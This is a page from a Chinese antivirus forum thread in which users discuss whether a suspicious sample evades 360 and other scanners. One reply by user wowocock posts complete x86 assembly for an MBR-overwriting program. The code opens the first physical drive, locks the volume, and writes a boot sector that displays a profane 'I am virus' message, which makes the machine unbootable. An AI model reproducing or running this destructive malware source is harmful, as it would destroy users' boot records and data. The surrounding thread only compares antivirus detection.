12
返回列表 发新帖
楼主: 3801187
收起左侧

[可疑文件] 有人试试能过360扫描么?

[复制链接]
消停
头像被屏蔽
发表于 2013-6-5 07:31:25 | 显示全部楼层
完爆诺顿!悲剧!
曹亮亮
发表于 2013-6-5 09:01:02 | 显示全部楼层
过不了360

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
skycai
发表于 2013-6-5 09:10:03 | 显示全部楼层
曹亮亮 发表于 2013-6-5 09:01
过不了360

4日的样本,到今天没入库就奇葩了。
wowocock
发表于 2013-6-5 10:18:57 | 显示全部楼层
来自于很老的代码了
先提权,然后
.586
.model flat, stdcall
locals @@

include useful.inc

extern    DeviceIoControl:Proc

.data
   
dbVirusCode:
    db    0b8h, 012h, 000h, 0cdh, 010h, 0bdh, 018h, 07ch
    db    0b9h, 018h, 000h, 0b8h, 001h, 013h, 0bbh, 00ch
    db    000h, 0bah, 01dh, 00eh, 0cdh, 010h, 0e2h, 0feh
    db    'I am virus! Fuck you :-)', 0
dwVirusCodeSize = $ - dbVirusCode

szPhysicalDrive0 db '\\.\PHYSICALDRIVE0', 0

.code

public c entry

entry proc
    LOCAL @szBuffer: BYTE
   
    xor        ebx, ebx

    lea        edi, [@szBuffer]
    push    edi
    push    edi
    xor        al, al
    mov        ecx, 1024
    rep        stosb
   
    mov        esi, offset dbVirusCode
    pop        edi
    push    dwVirusCodeSize
    pop        ecx
    rep        movsb
   
    pop        edi
    mov        by , 055h
    mov        by , 0AAh
   
    push    ebx
    push    ebx
    push    3            ;    OPEN_EXISTING
    push    ebx
    push    3            ;    FILE_SHARE_READ or FILE_SHARE_WRITE
    push    0c0000000h    ;    GENERIC_READ or GENERIC_WRITE
    push    offset szPhysicalDrive0
    callw    CreateFileA
    cmp        eax, -1
    je        @@ExitProc
   
    mov        esi, offset DeviceIoControl

    push    ebx
    mov        eax, esp
    push    ebx
    push    eax
    push    ebx
    push    ebx
    push    ebx
    push    ebx
    push    00090018h    ;    FSCTL_LOCK_VOLUME
    push    edi
    call    esi
   
    mov        eax, esp
    push    ebx
    push    eax
    push    512
    lea        eax, [@szBuffer]
    push    eax
    push    edi
    callw    WriteFile
   
    mov        eax, esp
    push    ebx
    push    eax
    push    ebx
    push    ebx
    push    ebx
    push    ebx
    push    0009001ch    ;    FSCTL_UNLOCK_VOLUME
    push    edi
    call    esi
   
    push    edi
    callw    CloseHandle

    pop        eax
@@ExitProc:
    ret

entry endp

end
天剑
发表于 2013-6-5 10:56:17 | 显示全部楼层
3801187 发表于 2013-6-4 20:54
数字的拉黑大法就是牛

具体来说是拉黑本论坛的样本快,对其他地方的样本拉黑就没这么快了
天剑
发表于 2013-6-5 10:57:22 | 显示全部楼层
mengld 发表于 2013-6-4 23:26
尾随ess

ess的强大已经不需要证明了
seasonyoung
发表于 2013-6-5 18:27:10 | 显示全部楼层
猎豹毫无压力,用猎豹下载样本是一件快乐的事情

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
87355437
发表于 2013-6-5 19:42:39 | 显示全部楼层
我实机~~
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-28 21:41 , Processed in 0.111266 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表